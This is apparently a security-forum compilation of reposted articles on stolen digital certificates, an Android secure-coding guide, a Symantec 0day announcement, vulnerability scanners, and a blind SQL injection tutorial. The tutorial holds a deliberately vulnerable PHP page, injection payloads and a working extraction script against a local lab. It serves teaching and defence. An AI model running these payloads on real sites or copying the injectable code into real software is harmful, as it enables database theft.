But the list of victims is long. KPN stopped issuing digital certificates after finding a collection of attack tools on one of its servers, likely used to compromise it. The company informed the media that there was no evidence that its CA infrastructure had been compromised, and that all the actions to respond to the incident had been started as a precaution. Experts at KPN discovered the tools during a security audit: they found a server hosting a DDoS tool. The application may have been there for as long as four years. Unfortunately, the list of defeats does not end there, because in the same period GemNET, a subsidiary of KPN (a leading telecommunications and ICT service provider in The Netherlands), suffered a data breach, and according to Webwereld, the hack was related to CA certificates.
The list of victims is reported in the following table, published by the expert Paolo Passeri on his blog hackmageddon.com. It also includes other giants like GlobalSign and DigiCert Malaysia.
Figure – CA incidents that occurred in 2011 (Hackmageddon.com)
Why attack a Certification Authority?
Cybercriminals and state-sponsored hackers are showing great interest in the PKI environment, and in particular they are interested in abusing digital certificates to conduct illicit activities like cyber espionage, sabotage or malware diffusion. The principal malicious uses of digital certificates are:
Improving malware diffusion
The installation of certain types of software (e.g. application updates) requires its code to be digitally signed with a trusted certificate. For this reason, cyber criminals and other bad actors have started to target entities managing digital certificates.
By stealing a digital certificate associated with a trusted vendor and signing malicious code with it, attackers reduce the chances that the malware will be detected quickly. Security experts have estimated that more than 200,000 unique malware binaries signed with valid digital signatures were discovered in the last couple of years. The most famous example is represented by the cyber weapon Stuxnet, used to infect nuclear plants for the enrichment of uranium in Iran. The code of the malware was signed using digital certificates associated with Realtek Semiconductor and JMicron Technology Corp, giving the appearance of legitimate software to the targeted systems. Stuxnet drivers were signed with certificates from JMicron Technology Corp and Realtek Semiconductor Corp, two companies that have offices in the Hsinchu Science and Industrial Park. Security experts at Kaspersky Lab hypothesized an insider job. It is also possible that the certificates were stolen using a dedicated Trojan such as Zeus, meaning there could be more.
Figure – Digital certificate used to sign Stuxnet
In September 2012, cyber criminals stole digital certificates associated with Adobe. According to security chief Brad Arkin, a group of hackers signed malware using an Adobe digital certificate after compromising a vulnerable build server of the company. The hacked server was used to get code validation from the company's code-signing system. "We have identified a compromised build server with access to the Adobe code signing infrastructure. We are proceeding with plans to revoke the certificate and publish updates for existing Adobe software signed using the impacted certificate … This only affects the Adobe software signed with the impacted certificate that runs on the Windows platform and three Adobe AIR applications* that run on both Windows and Macintosh. The revocation does not impact any other Adobe software for Macintosh or other platforms … Our forensic investigation is ongoing. To date we have identified malware on the build server and the likely mechanism used to first gain access to the build server. We also have forensic evidence linking the build server to the signing of the malicious utilities. We can confirm that the private key required for generating valid digital signatures was not extracted from the HSM," reported the company advisory (written by Arkin).
Figure – Adobe Breach Advisory
The hackers signed at least two malicious utilities with a valid and legitimate Adobe certificate: a password dumper and a malicious ISAPI filter. The two malicious programs were signed on July 26, 2012.
In April 2014, security researchers at Comodo AV Labs detected a new variant of the popular Zeus Trojan, enhanced with a digital signature to avoid detection. This instance is digitally signed with a stolen digital certificate, which belongs to a Microsoft developer.
Figure – Adobe Digital Certificate abused by cyber criminals
Economic Frauds
A digital signature gives a warranty on who signed a document, and you can decide whether you trust the person or company who signed the file and the organization that issued the certificate. If a digital certificate is stolen, the victim suffers an identity theft and its related implications. Malware authors could design a specific malicious agent to be spread with the purpose of stealing digital certificates. In the case of certificates associated with a web browser, it is possible to trick victims into thinking that a phishing site is legitimate.
Cyber warfare
Cyber espionage conducted by cyber criminals or state-sponsored hackers is the activity most frequently carried out with stolen certificates. Digital certificates are used by attackers to conduct "man-in-the-middle" attacks over secure connections, tricking users into thinking they are on a legitimate site while in fact their SSL/TLS traffic is being secretly tampered with and intercepted. One of the most blatant cases was the DigiNotar one, in which different companies like Facebook, Twitter, Skype and Google, and also intelligence agencies like the CIA, Mossad and MI6, were targeted in the Dutch government certificate hack. In 2011, the security firm Fox-IT discovered that the extent and duration of the breach were much more severe than had previously been disclosed. The attackers could have used the stolen certificates to spy on users of popular websites for weeks, without the users being able to detect it. "It's at least as bad as many of us thought … DigiNotar appears to have been totally owned for over a month without taking action, and they waited another month to take necessary steps to notify the public," said Chester Wisniewski, a senior security advisor at Sophos Canada, in a blog post. Fox-IT was commissioned by DigiNotar to conduct an audit, dubbed "Operation Black Tulip," and discovered that the servers of the company were compromised.
Another striking case was discovered in December 2013 by Google, which noticed the use of digital certificates issued for several Google domains by an intermediate certificate authority linked to ANSSI. ANSSI is the French cyber security agency that operates with the French intelligence agencies. The organization declared that an intermediate CA had generated fake certificates to conduct MITM attacks and inspect SSL traffic. Be aware that an intermediate CA certificate carries the full authority of the CA, so attackers can use it to create a certificate for any website they wish to impersonate. "ANSSI has found that the intermediate CA certificate was used in a commercial device, on a private network, to inspect encrypted traffic with the knowledge of the users on that network." Google discovered the ongoing MITM attack and blocked it, and ANSSI requested that the intermediate CA certificate be blocked.
Figure – Digital certificate warning
"As a result of a human error which was made during a process aimed at strengthening the overall IT security of the French Ministry of Finance, digital certificates related to third-party domains which do not belong to the French administration have been signed by a certification authority of the DGTrésor (Treasury) which is attached to the IGC/A.
"The mistake has had no consequences on the overall network security, either for the French administration or the general public. The aforementioned branch of the IGC/A has been revoked preventively. The reinforcement of the whole IGC/A process is currently under supervision to make sure no incident of this kind will ever happen again," stated the ANSSI advisory. The ANSSI attributed the incident to "human error" made by someone at the Finance Ministry, maintaining that the intermediate CA certificate was used in a commercial device, on a private network, to inspect encrypted traffic with the knowledge of the users on that network.
Misusing Digital Certificates
Digital certificates have been misused many times in recent years. Bad actors have abused them to conduct cyber attacks against private entities, individuals and government organizations.
The principal abuses of digital certificates observed by security experts are:
Man-in-the-middle (MITM) attacks
Bad actors use digital certificates to eavesdrop on SSL/TLS traffic. Usually these attacks exploit the lack of strict controls by client applications when a server presents them with an SSL/TLS certificate signed by a trusted but unexpected Certification Authority. SSL certificates are the privileged mechanism for ensuring that secure web sites really are who they say they are. Typically, when we access a secure website, a padlock is displayed in the address bar. Before the icon appears, the site first presents a digital certificate, signed by a trusted "root" authority, that attests to its identity and encryption keys. Unfortunately web browsers, due to improper design and the lack of efficient verification processes, accept certificates issued by a trusted CA even if it is an unexpected one. An attacker who is able to obtain a fake certificate from any certification authority and present it to the client during the connection phase can impersonate every encrypted web site the victim visits. "Most browsers will happily (and silently) accept new certificates from any valid authority, even for web sites for which certificates had already been obtained. An eavesdropper with fake certificates and access to a target's internet connection can thus quietly interpose itself as a 'man-in-the-middle', observing and recording all encrypted web traffic, with the user none the wiser."
Figure – MITM handshake
Cyber attacks based on signed malware
Another common cyber attack is based on malware signed with stolen code-signing certificates. The technique allows attackers to improve the evasion capabilities of their malicious code. Once the private key associated with a trusted entity is compromised, it can be used to sign the malware's malicious code. This trick also allows an attacker to install software components (e.g. drivers, software updates) that require signed code for their installation or execution. One of the most popular cases was the data breach suffered by the security firm Bit9. Attackers stole one of the company's certificates and used it to sign malware and serve it. The certificate was used to sign a malicious Java applet that exploited a flaw in the targeted browser.
Malware that installs illegitimate certificates
Attackers can also use malware to install illegitimate certificates so that they are trusted, avoiding security warnings. Malicious code could, for example, operate as a local proxy for SSL/TLS traffic, and the installed illegitimate digital certificates could allow attackers to eavesdrop on traffic without triggering any warning. The installation of a fake root CA certificate on the compromised system can also help attackers arrange a phishing campaign: the bad actor just needs to set up a fake domain that uses SSL/TLS and passes the certificate validation steps. Recently, Trend Micro published a report on a hacking campaign dubbed "Operation Emmental", which targeted Swiss bank accounts with a multi-faceted attack able to bypass the two-factor authentication implemented by the organizations to secure their customers. In order to improve the efficiency of their phishing scheme, the attackers used malware that installs a new root Secure Sockets Layer (SSL) certificate, which prevents the browser from warning victims when they land on these websites.
Figure – Certificate installed by malware in MS store
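A simple defensive counterpart to the MITM abuses described above is certificate pinning: record the fingerprint the legitimate server is known to present and raise an alarm when a different one appears. The Python sketch below illustrates the idea; the host name and the expected fingerprint are placeholders, and comparing a single fingerprint is only one of several possible pinning strategies.

import hashlib
import socket
import ssl

# Hypothetical pinned value, recorded earlier over a connection you trust
EXPECTED_SHA256 = "replace-with-the-known-good-fingerprint"

def cert_fingerprint(host, port=443):
    # Fetch the certificate the server presents and hash its DER encoding
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port)) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            der = tls.getpeercert(binary_form=True)
    return hashlib.sha256(der).hexdigest()

fp = cert_fingerprint("www.example.com")
if fp != EXPECTED_SHA256:
    print("WARNING: certificate changed, possible MITM (or a legitimate key rotation)")
else:
    print("Certificate matches the pinned fingerprint")

Note that a mismatch is not proof of an attack, since certificates are reissued regularly, but it is exactly the kind of change a fake root CA or a rogue intermediate CA would introduce.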
CAs issuing improper certificates
Sometimes improper certificates are issued by the CAs themselves, and hackers use them for cyber attacks. In one of the most blatant cases, DigiCert mistakenly sold a certificate to a non-existent company. The digital certificate was then used to sign malware used in cyber attacks.
How to steal a digital certificate
Malware is the privileged instrument for stealing a digital certificate and its associated private key from the victims. Experts at Symantec have tracked different strains of malware which have the capability to steal both private keys and digital certificates from Windows certificate stores. This malicious code exploits the operating system's own functionality: the Windows OS archives digital certificates in a certificate store. "Program code often uses the PFXExportCertStoreEx function to export certificate store information and save the information with a .pfx file extension (the actual file format it uses is PKCS#12). The PFXExportCertStoreEx function with the EXPORT_PRIVATE_KEYS option stores both digital certificates and the associated private keys, so the .pfx file is useful to the attacker," states a blog post from Symantec. The CertOpenSystemStoreA function can be used to open a certificate store, while the PFXExportCertStoreEx function exports the content of the following certificate stores:
MY: A certificate store that holds certificates with the associated private keys
CA: Certificate authority certificates
ROOT: Root certificates
SPC: Software Publisher Certificates
By invoking the PFXExportCertStoreEx function with the EXPORT_PRIVATE_KEYS option, it is possible to export both the digital certificates and the associated private keys. The code in the following image performs the following actions:
Opens the MY certificate store
Allocates 3C245h bytes of memory
Calculates the actual data size
Frees the allocated memory
Allocates memory for the actual data size
Calls PFXExportCertStoreEx, which writes data to the CRYPT_DATA_BLOB area that pPFX points to
Writes the content of the certificate store
Figure – Malware code to access certificate information
The experts noticed that a similar process is implemented by almost every malware family used to steal digital certificates: malicious code is used to steal certificate store information when the computer starts running. Once an attacker has obtained the victim's private key from a stolen certificate, they can use a tool like the Microsoft signing tool bundled with the Windows DDK, the Platform SDK, and Visual Studio. Running Sign Tool (signtool.exe), it is possible to digitally sign any code, including malware.
Abuse prevention
I would like to close this post by introducing a couple of initiatives started to prevent the abuse of digital certificates. The first was started by a security researcher at Abuse.ch, who has launched the SSL Black List (SSLBL), a project to create an archive of all the digital certificates used for illicit activities. Abuse.ch is a Swiss organization that has been involved in recent years in many investigations of the major banking Trojan families and botnets. "The goal of SSLBL is to provide a list of bad SHA1 fingerprints of SSL certificates that are associated with malware and botnet activities. Currently, SSLBL provides an IP based and a SHA1 fingerprint based blacklist in CSV and Suricata rule format.
SSLBL helps you in detecting potential botnet C&C traffic that relies on SSL, such as KINS (aka VMZeuS) and Shylock," wrote the researcher in the blog post introducing the initiative. The need to track the abuse of certificates has emerged in recent years, after security experts discovered many cases in which bad actors abused digital certificates for illicit activities, ranging from malware distribution to Internet surveillance. Authors of malware are exploiting new methods to avoid detection by defense systems and security experts; for example, many attackers are using SSL to protect the malicious traffic between C&C servers and infected machines. Each item in the list associates a certificate with the malicious operations in which attackers used it. The abuses include botnets, malware campaigns, and banking malware. The archive behind the SSL Black List, which currently includes more than 125 digital certificates, comprises the SHA-1 fingerprint of each certificate together with a description of the abuse. Many entries are associated with popular botnets and malware-based attacks, including Zeus, Shylock and KINS. The SSL Black List is another project that can help the security community prevent cyber attacks. As the database matures, it will represent a valuable resource for security experts dealing with malware and botnet operators that use certificates in their operations.
Abuse.ch isn't the only entity active in preventing the illicit use of certificates. Google is very active in the prevention of any abuse of stolen or unauthorized digital certificates. Earlier this year, the company launched its Certificate Transparency project, a sort of public register of the digital certificates that have been issued. "Specifically, Certificate Transparency makes it possible to detect SSL certificates that have been mistakenly issued by a certificate authority or maliciously acquired from an otherwise unimpeachable certificate authority. It also makes it possible to identify certificate authorities that have gone rogue and are maliciously issuing certificates," states the official page of the project. Unfortunately, many certificate authorities still aren't providing logs to the public.
References
http://www.firmadigitalefacile.it/cosa-e-un-certificato-digitale/
http://securityaffairs.co/wordpress/647/cyber-crime/2011-cas-are-under-attack-why-steal-a-certificate.html
http://hackmageddon.com/2011/12/10/another-certification-authority-breached-the-12th/
Turkey - Another story on use of fraudulent digital certificates - Security Affairs
http://securityaffairs.co/wordpress/222/cyber-crime/avoid-control-lets-digitally-sign-malware-code.html
http://www.symantec.com/connect/blogs/diginotar-ssl-breach-update
Adobe Code Signing Certificate used to sign malware, who to blame? - Security Affairs
SSL Blacklist a new weapon to fight malware and botnet - Security Affairs
http://www.darkreading.com/attacks-and-breaches/stolen-digital-certificates-compromised-cia-mi6-tor/d/d-id/1099964?
How Attackers Steal Private Keys from Digital Certificates - Symantec Connect
How Digital Certificates Are Used and Misused
http://securityaffairs.co/wordpress/12264/cyber-crime/bit9-hacked-stolen-digital-certificates-to-sign-malware.html
http://files.cloudprivacy.net/ssl-mitm.pdf
http://securityaffairs.co/wordpress/4544/hacking/stuxnet-duqu-update-on-cyber-weapons-usage.html
http://www.globalsign.com/company/press/090611-security-response.html
http://www.wired.com/threatlevel/2011/10/son-of-stuxnet-in-the-wild/
Stuxnet signed certificates frequently asked questions - Securelist
http://nakedsecurity.sophos.com/2011/11/03/another-certificate-authority-issues-dangerous-certficates/
http://www.f-secure.com/weblog/archives/00002269.html
http://nakedsecurity.sophos.com/2011/12/08/second-dutch-security-firm-hacked-unsecured-phpmyadmin-implicated
By Pierluigi Paganini | July 28th, 2014
Sursa: How Cybercrime Exploits Digital Certificates - InfoSec Institute
-
Android Application Secure Design/Secure Coding Guidebook
1. Introduction
1.1. Building a Secure Smartphone Society
1.2. Timely Feedback on a Regular Basis Through the Beta Version
1.3. Usage Agreement of the Guidebook
2. Composition of the Guidebook
2.1. Developer's Context
2.2. Sample Code, Rule Book, Advanced Topics
2.3. The Scope of the Guidebook
2.4. Literature on Android Secure Coding
2.5. Steps to Install Sample Codes into Eclipse
3. Basic Knowledge of Secure Design and Secure Coding
3.1. Android Application Security
3.2. Handling Input Data Carefully and Securely
4. Using Technology in a Safe Way
4.1. Creating/Using Activities
4.2. Receiving/Sending Broadcasts
4.3. Creating/Using Content Providers
4.4. Creating/Using Services
4.5. Using SQLite
4.6. Handling Files
4.7. Using Browsable Intent
4.8. Outputting Log to LogCat
4.9. Using WebView
5. How to use Security Functions
5.1. Creating Password Input Screens
5.2. Permission and Protection Level
5.3. Add In-house Accounts to Account Manager
5.4. Communicating via HTTPS
6. Difficult Problems
6.1. Risk of Information Leakage from Clipboard
Download: http://www.jssec.org/dl/android_securecoding_en.pdf
-
Symantec Endpoint Protection 0day In a recent engagement, we had the opportunity to audit a leading Antivirus Endpoint Protection solution, where we found a multitude of vulnerabilities. Some of these made it to CERT, while others have been scheduled for review during our upcoming AWE course at Black Hat 2014, Las Vegas. Ironically, the same software that was meant to protect the organization under review was the reason for its compromise. We’ll be publishing the code for this privilege escalation exploit in the next few days. In the meantime, you can check out our demo video of the exploitation process – best viewed in full screen. [h=5]More shameless Kali Dojo plugs[/h] If you’re attending the Black Hat, Brucon or Derbycon 2014 conferences, don’t forget to come by our free Kali Dojo Workshops for some serious Kali Linux fu. See you there! Sursa: http://www.offensive-security.com/vulndev/symantec-endpoint-protection-0day/
-
Automated vs hybrid vulnerability scanning
A CIO's experience
Aleksandr Kirpo, CSO of the credit card processor Ukrainian Processing Center
You will have heard about programs that perform automated security scanning for website safety assessments. Such scanning software was developed in response to international standards such as PCI DSS and the security requirements they specify. While these scanners may be familiar to e-commerce firms, for owners of businesses where no such standards apply, the idea of security scanners may be new. There are many broadly similar security scanners available as software or SaaS, and for the uninitiated it can be difficult to understand the differences between them or their strengths and weaknesses. Further, despite their apparent simplicity, for organisations that do not have a professional information security officer it can be incredibly difficult to make effective use of these systems and the reports they generate. It seems so simple: launch or order the scanner service, get the report and pass it to the development team for bug fixing. So what is the problem? There are actually two:
Just like the automated antivirus programs we run on our desktops, automatic website scanners do not always discover all vulnerabilities. That said, if the website is very simple it is likely that the scanner will indeed find all the vulnerabilities, but for more complex websites such effectiveness cannot be guaranteed.
Automatic scanners almost always report vulnerabilities that don't actually exist on the website (false positives). Sadly, the more "clever" a scanner is, the longer it scans and the more false positive results are likely to be reported.
So, can you get a report that reveals all the vulnerabilities and excludes false positives? Many IT security standards provide the answer and suggest using code reviews and penetration tests. The only problem with this approach is the price: it can be extremely high. There are few qualified professionals who can conduct code reviews and penetration tests reliably, and such professionals are expensive.
Not all scanners are created equal
During my eighteen years in IT and IT security, I have made use of many types of security and scanning services and have had the chance to compare the results from automatic scanners, hybrid scanners and penetration testing. Here I share three examples of using website security scanning software.
When conducting a website assessment in 2013 we tried web security solutions from both Qualys and High-Tech Bridge. The outputs of these scans were a report from Qualys (100 pages) and one from High-Tech Bridge's ImmuniWeb (15 pages). It was easy for me to read and understand each report, but knowing the shortcomings of automated scanners I was aware that the website could still have multiple (critical) security vulnerabilities that the automatic scanners would not have found. The two solutions take a totally different approach: while Qualys is a fully automated scanner, High-Tech Bridge's ImmuniWeb is a hybrid solution where the automated scanner is guided by a real person and complemented by manual penetration testing by a security professional. In recent years we found, when scanning websites, that the Qualys scanner would stop responding. If, as we were, you are chasing standards compliance, this can be a major headache because you are left without a compliance report or even some information that helps you understand the security level of the site.
Of course there is technical support provided by scanner vendors: the last time I needed technical support from Qualys, it took me about a month to get the issue resolved. High-Tech Bridge's portal support replied within a few hours.
On another occasion we assessed a medium-sized website using IBM Rational AppScan. The final document from AppScan came to 850 pages and listed 36 vulnerabilities. Analysing the entire 850-page report and checking the website cost our developers about a month of effort, and ultimately they reported that these vulnerabilities were not actually exploitable. Next, we ordered expensive manual penetration testing from a German company, the results of which showed that none of the vulnerabilities reported by AppScan existed; they were all false positives (needless to say, the testing cost a lot of money). Finally, we ordered an ImmuniWeb assessment for 639 USD (now the price is 990 USD). The assessment had only one recommendation, to use a trusted SSL certificate, a recommendation echoed by the developers and the testers who conducted the penetration tests. This is a very good example of how automated solutions can waste your time and money even if your web applications are safe.
How intelligent are security scanners?
A security professional reading a report generated by automatic scanners will recognise that the way these scanners work is through pattern matching. What's wrong with that? Well, it means that any substantial deviation from the template will cause the scanner to miss the vulnerability. A website owner should be aware that there are programmers who will leave vulnerabilities in the code on purpose, and some do it in a way that the scanners cannot detect. Even the most advanced automatic scanners need to match against a huge number of templates, which is probably why so many scanners take such a long time to complete a website scan.
Pattern-matching automated scanners have much in common with antivirus software. With antivirus software, the icon on your computer does not mean that there is no virus on your PC; it just means that the antivirus hasn't recognised any viruses on your PC. The success of antivirus and automatic scanners depends on many factors, such as how up to date the software and the pattern-matching databases are, together with some mechanism for concluding that vulnerabilities (or viruses) are present. So, to be truly effective, the fully automated approach needs to be supplemented by an IT security expert who can add human intelligence and professional experience to the process and ultimately give confidence that vulnerabilities will not go unnoticed during a security scan.
Adding human intelligence is what the Swiss company High-Tech Bridge did with its hybrid scanning approach. Its innovative SaaS, called ImmuniWeb, combines automated scanning with manual testing: the scanning is done by a program and, at the same time, the results of the scanner are checked and completed by a professional who is qualified to carry out penetration tests. This expert can refine tasks for scanning immediately, based on the website being assessed, eliminating false positives from the scanner report thanks to the involvement of the expert. Moreover, manual penetration testing guarantees the highest detection rate of vulnerabilities. It is interesting to note that the results of the low-cost hybrid assessment and of expensive professional penetration tests are, in certain cases, the same. For example, say an open source based platform is used for the website.
The expert is already aware of the known vulnerabilities of that platform at the time of scanning. So in the case of the hybrid approach, the expert need only find out the version of the platform being used and check its settings. Thus, the report will be specific to the platform used and contain only information relating to vulnerabilities that really exist and are exploitable.
If you have decided to check the security of your website quickly and economically, then you need to decide which scanner to choose: an automatic one with a huge report that in practice is never read to the end, or a hybrid one with a brief report containing recommendations verified and completed by a security expert.
What is the best way to check whether your website is secure?
For firms building new websites or updating existing ones, here's a list of factors to consider:
1. The specification you give to the developer should be prepared with security in mind. The website developer should:
have a good understanding of the secure software development lifecycle,
attend regular web security trainings,
perform obligatory code reviews, handled internally or by a third-party company,
have established IT security processes in the company.
Software testing at all stages should include testing for security issues.
Ongoing maintenance of the website should cover improvements and updates, etc.
Ensure a credible and effective response to hacking, DoS and DDoS attacks.
The infrastructure of your website should be properly protected. Beware of trusting your server host to secure your website. Hosting companies often make much noise about their security services (usually limited to one or more antivirus and malware-detection programs). However, such measures reduce the risk of an infrastructure breach but are absolutely insufficient for protecting a website as a separate software package. So when you need to check the security of your website, it means that you need scans and penetration tests of your web application, not of the infrastructure (which is also vital for website security, but there are far fewer vectors for infrastructure hacking and hardening). By the way, infrastructure security should be fully checked and assured by the hosting company, so make sure it is mentioned in your contract.
Sursa: Automated vs hybrid vulnerability scanning | ITsecurityITsecurity
-
Writing your own blind SQLi script
We all know that sqlmap is a really great tool which has a lot of options that you can tweak and adjust to exploit the SQLi vuln you just found (or that sqlmap found for you). On rare occasions, however, you might want to just have a small and simple script, or you just want to learn how to do it yourself. So let's see how you could write your own script to exploit a blind SQLi vulnerability. Just to make sure we are all on the same page, here is the blind SQLi definition from OWASP:
Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the application's response.
You can also roughly divide the exploitation techniques into two categories (like OWASP does), namely:
content based: the page output tells you if the query was successful or not
time based: based on a time delay you can determine if your query was successful or not
Of course you have dozens of variations on the above two techniques; I wrote about one such variation a while ago. For this script we are going to just focus on the basics of the mentioned techniques. If you are more interested in knowing how to find SQLi vulnerabilities you could read my article on Solving RogueCoder's SQLi challenge. Since we are only focusing on automating a blind SQL injection, we will not be building functionality to find SQL injections.
Before we even think about sending SQL queries to the server, let's first set up the vulnerable environment and try to be a bit realistic about it. Normally this means that you at least have to log in, keep your session and then inject. In some cases you might even have to take into account CSRF tokens which, depending on the implementation, means you have to parse some HTML before you can send the request. This will however be out of scope for this blog entry. If you want to know how you could parse HTML with python you could take a look at my credential scavenger entry. If you just want the scripts you can find them in the example_bsqli_scripts repository on my github; since this is an entry on how you could write your own scripts, all the values are hard coded in the script.
The vulnerable environment
Since we are doing this for learning purposes anyways, let's create almost everything from scratch:
sudo apt-get install mysql-server mysql-client
sudo apt-get install php5-mysql
sudo apt-get install apache2 libapache2-mod-php5
Now let's write some vulnerable code and abuse the mysql database and its tables for our vulnerable script, which saves us the trouble of creating a test database.
pwnme-plain.php
<?php
$username = "root";
$password = "root";
$link = mysql_connect('localhost',$username,$password);
if(!$link){
    die(mysql_error());
}
if(!mysql_select_db("mysql",$link)){
    die(mysql_error());
}
$result = mysql_query("select user,host from user where user='" . $_GET['name'] . "'",$link);
echo "<html><body>";
if(mysql_num_rows($result) > 0){
    echo "User exists<br/>";
}else{
    echo "User does not exist<br/>";
}
if($_GET['debug'] === "1"){
    while ($row = mysql_fetch_assoc($result)){
        echo $row['user'] . ":" . $row['host'] . "<br/>";
    }
}
echo "</body></html>";
mysql_free_result($result);
mysql_close($link);
?>
As you can see, if you give it a valid username it will say the user exists, and if you don't give it a valid username it will tell you the user doesn't exist. If you need more information you can append a debug flag to get actual output.
You probably also spotted the SQL injection, which you can for example exploit like this:
http://localhost/pwnme-plain.php?name=x' union select 1,2--+
Which results in the output:
User exists
and if you mess up the query or the query doesn't return any row it will result in:
User does not exist
Sending and receiving data
We are going to use the python package requests for this. If you haven't heard of it yet, it makes working with http stuff even easier than urllib2. If you happen to encounter weird errors with the requests library you might want to install the library yourself instead of using the one provided by your distro. To make a request using GET and get the page content you'd use:
print requests.get("http://localhost/pwnme-plain.php").text
If you want to pass in parameters you'd do it like this:
urlparams = {'name':'root'}
print requests.get("http://localhost/pwnme-plain.php",params=urlparams).text
Which ensures that the parameters are automatically encoded. To make a request using POST you'd use:
postdata = {'user':'webuser','pass':'webpass'}
print requests.post("http://localhost/pwnme-login.php",data=postdata).text
That's all you need to start sending your SQLi payload and receiving the response.
Content based automation
For content based automation you basically need a query which will change the content based on the output of the query. You can do this in a lot of ways; here are two examples:
display or don't display content: id=1 and 1=if(substring((select @@version),1,1)=5,1,2)
display content based on the query output: id=1 + substring((select @@version),1,1)
For our automation script we will choose the first way of automating it, since it depends less on the available content. The first thing you need is a "universal" query which you use as the base to execute all your other queries. In our case this could be:
root' and 1=if(({PLACEHOLDER})=PLACEHOLDERVAR,1,2)--+
With the above query we can decide what we want to display. If we want to display the wrong content, we have to replace the PLACEHOLDER text and PLACEHOLDERVAR with something that will make the 'if clause' choose '2', for example:
root' and 1=if(substring((select @@version),1,1)=20,1,2)--+
Since there is no mysql version 20, this will lead to a query that ends up being evaluated as:
root' and 1=2
Which results in a False result, thus displaying the wrong content, in our case 'User does not exist'. If on the other hand we want the query to display the good content we can just change it to:
root' and 1=if(substring((select @@version),1,1)=5,1,2)--+
Which of course will end up as:
root' and 1=1
Articol complet: Writing your own blind SQLi script | DiabloHorn
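The full post goes on to turn this into a working extraction script. As a rough sketch of where it is heading, here is a minimal boolean-based extractor built around the page and the "universal" query shown above; the URL and the "User exists" marker come from this post, while the binary search over ASCII values is just one common way to recover a string character by character, not necessarily the exact approach of the original script.

import requests

URL = "http://localhost/pwnme-plain.php"
TRUE_MARKER = "User exists"
session = requests.Session()

def test(condition):
    # Inject the boolean condition into the 'universal' query and check which content comes back.
    # '-- ' followed by a trailing character comments out the rest of the query;
    # requests takes care of URL-encoding the payload for us.
    payload = "root' and 1=if((%s),1,2)-- -" % condition
    response = session.get(URL, params={'name': payload})
    return TRUE_MARKER in response.text

def extract(query, max_length=64):
    # Recover the query result one character at a time via a binary search on the ASCII value
    result = ""
    for position in range(1, max_length + 1):
        low, high = 0, 127
        while low < high:
            middle = (low + high) // 2
            if test("ascii(substring((%s),%d,1))>%d" % (query, position, middle)):
                low = middle + 1
            else:
                high = middle
        if low == 0:  # ascii('') is 0 in MySQL, so we ran past the end of the string
            break
        result += chr(low)
    return result

print(extract("select @@version"))

A time-based variant would keep the same structure, except that test() would inject something like if((condition),sleep(5),0) and decide based on the response time instead of the page content. If the target required authentication, the same requests.Session object could first be used to log in so that the injected requests carry the session cookie.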